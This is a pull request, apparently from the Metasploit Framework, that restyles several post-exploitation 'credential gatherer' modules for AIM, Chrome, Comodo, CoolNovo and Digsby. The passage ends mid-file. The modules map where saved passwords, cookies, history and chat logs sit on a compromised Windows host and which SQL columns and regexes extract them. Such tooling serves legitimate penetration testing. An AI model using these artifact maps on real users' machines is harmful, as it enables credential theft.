### PR TITLE
Rubocop fixes

### DIFF
--- a/modules/post/windows/gather/credentials/aim.rb
+++ b/modules/post/windows/gather/credentials/aim.rb
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
         OptEnum.new('ARTIFACTS', [
-          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
                                                           k[:filetypes]
                                                         end.uniq.unshift('All')
         ])

--- a/modules/post/windows/gather/credentials/aim.rb
+++ b/modules/post/windows/gather/credentials/aim.rb
@@ -10,85 +10,94 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
+  ARTIFACTS =
+    {
+      application: 'AIM',
+      app_category: 'chats',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'LocalAppData',
+          dir: 'AIM',
+          artifact_file_name: 'aimx.bin',
+          description: "AIM's saved Username and Passwords",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'chat_logs',
+          path: 'LocalAppData',
+          dir: 'AIM',
+          artifact_file_name: '*.html',
+          description: "AIM's chat logs with date and times",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        }
+      ]
+    }.freeze
 
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Aim credential gatherer',
-                      'Description' => "
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for Aim credentials on a windows remote host.
-      ",
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": 'AIM',
-                          "app_category": 'chats',
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": 'logins',
-                              "path": 'LocalAppData',
-                              "dir": 'AIM',
-                              "artifact_file_name": 'aimx.bin',
-                              "description": "AIM's saved Username and Passwords",
-                              "credential_type": 'text',
-                              "regex_search": [
-                                {
-                                  "extraction_description": 'Searches for credentials (USERNAMES/PASSWORDS)',
-                                  "extraction_type": 'credentials',
-                                  "regex": [
-                                    '(?i-mx:password.*)',
-                                    '(?i-mx:username.*)'
-                                  ]
-                                },
-                                {
-                                  "extraction_description": 'searches for Email TO/FROM address',
-                                  "extraction_type": 'Email addresses',
-                                  "regex": [
-                                    '(?i-mx:to:.*)',
-                                    '(?i-mx:from:.*)'
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": 'chat_logs',
-                              "path": 'LocalAppData',
-                              "dir": 'AIM',
-                              "artifact_file_name": '*.html',
-                              "description": "AIM's chat logs with date and times",
-                              "credential_type": 'text',
-                              "regex_search": [
-                                {
-                                  "extraction_description": 'Searches for credentials (USERNAMES/PASSWORDS)',
-                                  "extraction_type": 'credentials',
-                                  "regex": [
-                                    '(?i-mx:password.*)',
-                                    '(?i-mx:username.*)'
-                                  ]
-                                },
-                                {
-                                  "extraction_description": 'searches for Email TO/FROM address',
-                                  "extraction_type": 'Email addresses',
-                                  "regex": [
-                                    '(?i-mx:to:.*)',
-                                    '(?i-mx:from:.*)'
-                                  ]
-                                }
-                              ]
-                            }
-                          ]
-                        }))
+    super(
+      update_info(
+        info,
+        'Name' => 'Aim credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for Aim credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -96,9 +105,11 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
-                                                                                  k[:filetypes]
-                                                                                end.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [
+          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+                                                          k[:filetypes]
+                                                        end.uniq.unshift('All')
+        ])
       ]
     )
   end
@@ -111,7 +122,7 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'

--- a/modules/post/windows/gather/credentials/chrome.rb
+++ b/modules/post/windows/gather/credentials/chrome.rb
@@ -119,7 +119,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
         OptEnum.new('ARTIFACTS', [
-          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
                                                           k[:filetypes]
                                                         end.uniq.unshift('All')
         ])

--- a/modules/post/windows/gather/credentials/chrome.rb
+++ b/modules/post/windows/gather/credentials/chrome.rb
@@ -10,98 +10,107 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
+  ARTIFACTS =
+    {
+      application: 'chrome',
+      app_category: 'browsers',
+      gatherable_artifacts: [
+        {
+          filetypes: 'cookies',
+          path: 'LocalAppData',
+          dir: 'Google',
+          artifact_file_name: 'Cookies',
+          description: "Chrome's Cookies",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports Chrome's Cookie data",
+              sql_table: 'cookies',
+              sql_column: 'host_key, name, path'
+            }
+          ]
+        },
+        {
+          filetypes: 'logins',
+          path: 'LocalAppData',
+          dir: 'Google',
+          artifact_file_name: 'Login Data',
+          description: "Chrome's saved Username and Passwords",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'logins',
+              sql_column: 'username_value, action_url'
+            }
+          ]
+        },
+        {
+          filetypes: 'web_history',
+          path: 'LocalAppData',
+          dir: 'Google',
+          artifact_file_name: 'History',
+          description: "Chrome's History",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'urls',
+              sql_column: 'url'
+            },
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'keyword_search_terms',
+              sql_column: 'lower_term'
+            },
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'downloads',
+              sql_column: 'current_path, tab_referrer_url'
+            },
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'segments',
+              sql_column: 'name'
+            },
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'downloads_url_chains',
+              sql_column: 'url'
+            }
+          ]
+        }
+      ]
+    }.freeze
 
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Chrome credential gatherer',
-                      'Description' => "
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for credentials stored on Chrome in a windows remote host.
-      ",
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": 'chrome',
-                          "app_category": 'browsers',
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": 'cookies',
-                              "path": 'LocalAppData',
-                              "dir": 'Google',
-                              "artifact_file_name": 'Cookies',
-                              "description": "Chrome's Cookies",
-                              "credential_type": 'sqlite',
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Cookie data",
-                                  "sql_table": 'cookies',
-                                  "sql_column": 'host_key, name, path'
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": 'logins',
-                              "path": 'LocalAppData',
-                              "dir": 'Google',
-                              "artifact_file_name": 'Login Data',
-                              "description": "Chrome's saved Username and Passwords",
-                              "credential_type": 'sqlite',
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": 'logins',
-                                  "sql_column": 'username_value, action_url'
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": 'web_history',
-                              "path": 'LocalAppData',
-                              "dir": 'Google',
-                              "artifact_file_name": 'History',
-                              "description": "Chrome's History",
-                              "credential_type": 'sqlite',
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": 'urls',
-                                  "sql_column": 'url'
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": 'keyword_search_terms',
-                                  "sql_column": 'lower_term'
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": 'downloads',
-                                  "sql_column": 'current_path, tab_referrer_url'
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": 'segments',
-                                  "sql_column": 'name'
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": 'downloads_url_chains',
-                                  "sql_column": 'url'
-                                }
-                              ]
-                            }
-                          ]
-                        }))
+    super(
+      update_info(
+        info,
+        'Name' => 'Chrome credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for credentials stored on Chrome in a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -109,9 +118,11 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
-                                                                                  k[:filetypes]
-                                                                                end.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [
+          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+                                                          k[:filetypes]
+                                                        end.uniq.unshift('All')
+        ])
       ]
     )
   end
@@ -124,7 +135,7 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'

--- a/modules/post/windows/gather/credentials/comodo.rb
+++ b/modules/post/windows/gather/credentials/comodo.rb
@@ -10,133 +10,142 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
+  ARTIFACTS =
+    {
+      application: 'comodo',
+      app_category: 'browsers',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'LocalAppData',
+          dir: 'Comodo',
+          artifact_file_name: 'Login Data',
+          description: "Comodo's saved Username and Passwords",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'logins',
+              sql_column: 'action_url, username_value'
+            }
+          ]
+        },
+        {
+          filetypes: 'cookies',
+          path: 'LocalAppData',
+          dir: 'Comodo',
+          artifact_file_name: 'Cookies',
+          description: "Comodo's saved cookies",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports Chrome's Cookie data",
+              sql_table: 'cookies',
+              sql_column: 'host_key, name, path'
+            }
+          ]
+        },
+        {
+          filetypes: 'web_history',
+          path: 'LocalAppData',
+          dir: 'Comodo',
+          artifact_file_name: 'History',
+          description: "Comodo's History",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'urls',
+              sql_column: 'url'
+            },
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'keyword_search_terms',
+              sql_column: 'lower_term'
+            },
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'downloads',
+              sql_column: 'current_path, tab_referrer_url'
+            },
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'segments',
+              sql_column: 'name'
+            },
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'downloads_url_chains',
+              sql_column: 'url'
+            }
+          ]
+        },
+        {
+          filetypes: 'web_history',
+          path: 'LocalAppData',
+          dir: 'Comodo',
+          artifact_file_name: 'Visited Links',
+          description: "Comodo's History",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'urls',
+              sql_column: 'url'
+            },
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'keyword_search_terms',
+              sql_column: 'lower_term'
+            },
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'downloads',
+              sql_column: 'current_path, tab_referrer_url'
+            },
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'segments',
+              sql_column: 'name'
+            },
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'downloads_url_chains',
+              sql_column: 'url'
+            }
+          ]
+        }
+      ]
+    }.freeze
 
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Comodo credential gatherer',
-                      'Description' => "
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-        This is a module that searches for credentials stored in Comodo on a windows remote host.
-      ",
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": 'comodo',
-                          "app_category": 'browsers',
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": 'logins',
-                              "path": 'LocalAppData',
-                              "dir": 'Comodo',
-                              "artifact_file_name": 'Login Data',
-                              "description": "Comodo's saved Username and Passwords",
-                              "credential_type": 'sqlite',
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": 'logins',
-                                  "sql_column": 'action_url, username_value'
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": 'cookies',
-                              "path": 'LocalAppData',
-                              "dir": 'Comodo',
-                              "artifact_file_name": 'Cookies',
-                              "description": "Comodo's saved cookies",
-                              "credential_type": 'sqlite',
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Cookie data",
-                                  "sql_table": 'cookies',
-                                  "sql_column": 'host_key, name, path'
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": 'web_history',
-                              "path": 'LocalAppData',
-                              "dir": 'Comodo',
-                              "artifact_file_name": 'History',
-                              "description": "Comodo's History",
-                              "credential_type": 'sqlite',
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": 'urls',
-                                  "sql_column": 'url'
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": 'keyword_search_terms',
-                                  "sql_column": 'lower_term'
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": 'downloads',
-                                  "sql_column": 'current_path, tab_referrer_url'
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": 'segments',
-                                  "sql_column": 'name'
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": 'downloads_url_chains',
-                                  "sql_column": 'url'
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": 'web_history',
-                              "path": 'LocalAppData',
-                              "dir": 'Comodo',
-                              "artifact_file_name": 'Visited Links',
-                              "description": "Comodo's History",
-                              "credential_type": 'sqlite',
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": 'urls',
-                                  "sql_column": 'url'
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": 'keyword_search_terms',
-                                  "sql_column": 'lower_term'
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": 'downloads',
-                                  "sql_column": 'current_path, tab_referrer_url'
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": 'segments',
-                                  "sql_column": 'name'
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": 'downloads_url_chains',
-                                  "sql_column": 'url'
-                                }
-                              ]
-                            }
-                          ]
-                        }))
+    super(
+      update_info(
+        info,
+        'Name' => 'Comodo credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for credentials stored in Comodo on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -144,9 +153,11 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
-                                                                                  k[:filetypes]
-                                                                                end.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [
+          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+                                                          k[:filetypes]
+                                                        end.uniq.unshift('All')
+        ])
       ]
     )
   end
@@ -159,7 +170,7 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'

--- a/modules/post/windows/gather/credentials/comodo.rb
+++ b/modules/post/windows/gather/credentials/comodo.rb
@@ -154,7 +154,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
         OptEnum.new('ARTIFACTS', [
-          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
                                                           k[:filetypes]
                                                         end.uniq.unshift('All')
         ])

--- a/modules/post/windows/gather/credentials/coolnovo.rb
+++ b/modules/post/windows/gather/credentials/coolnovo.rb
@@ -10,64 +10,72 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
+  ARTIFACTS =
+    {
+      application: 'coolnovo',
+      app_category: 'browsers',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'LocalAppData',
+          dir: 'MapleStudio',
+          artifact_file_name: 'Login Data',
+          description: 'CoolNovo saved Username and Passwords',
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports Coolnovo's Login data",
+              sql_table: 'logins',
+              sql_column: 'action_url, username_value'
+            }
+          ]
+        },
+        {
+          filetypes: 'logins',
+          path: 'LocalAppData',
+          dir: 'MapleStudio',
+          artifact_file_name: 'Login Data',
+          description: 'CoolNovo saved Username and Passwords',
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports Coolnovo's Login data",
+              sql_table: 'logins',
+              sql_column: 'action_url, username_value'
+            }
+          ]
+        }
 
+      ]
+    }.freeze
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Coolnovo credential gatherer',
-                      'Description' => "
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for Coolnovo credentials on a windows remote host.
-      ",
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": 'coolnovo',
-                          "app_category": 'browsers',
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": 'logins',
-                              "path": 'LocalAppData',
-                              "dir": 'MapleStudio',
-                              "artifact_file_name": 'Login Data',
-                              "description": 'CoolNovo saved Username and Passwords',
-                              "credential_type": 'sqlite',
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports Coolnovo's Login data",
-                                  "sql_table": 'logins',
-                                  "sql_column": 'action_url, username_value'
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": 'logins',
-                              "path": 'LocalAppData',
-                              "dir": 'MapleStudio',
-                              "artifact_file_name": 'Login Data',
-                              "description": 'CoolNovo saved Username and Passwords',
-                              "credential_type": 'sqlite',
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports Coolnovo's Login data",
-                                  "sql_table": 'logins',
-                                  "sql_column": 'action_url, username_value'
-                                }
-                              ]
-                            }
-
-                          ]
-                        }))
+    super(
+      update_info(
+        info,
+        'Name' => 'Coolnovo credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for Coolnovo credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -75,9 +83,11 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
-                                                                                  k[:filetypes]
-                                                                                end.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [
+          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+                                                          k[:filetypes]
+                                                        end.uniq.unshift('All')
+        ])
       ]
     )
   end
@@ -90,7 +100,7 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'

--- a/modules/post/windows/gather/credentials/coolnovo.rb
+++ b/modules/post/windows/gather/credentials/coolnovo.rb
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
         OptEnum.new('ARTIFACTS', [
-          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
                                                           k[:filetypes]
                                                         end.uniq.unshift('All')
         ])

--- a/modules/post/windows/gather/credentials/digsby.rb
+++ b/modules/post/windows/gather/credentials/digsby.rb
@@ -10,59 +10,67 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
-
+  ARTIFACTS =
+    {
+      application: 'digsby',
+      app_category: 'chats',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'LocalAppData',
+          dir: 'Digsby',
+          artifact_file_name: 'logininfo.yaml',
+          description: "Digsby's saved Username &amp; Passwords",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        }
+      ]
+    }.freeze
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Digsby credential gatherer',
-                      'Description' => "
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for Digsby credentials on a windows remote host.
-      ",
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": 'digsby',
-                          "app_category": 'chats',
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": 'logins',
-                              "path": 'LocalAppData',
-                              "dir": 'Digsby',
-                              "artifact_file_name": 'logininfo.yaml',
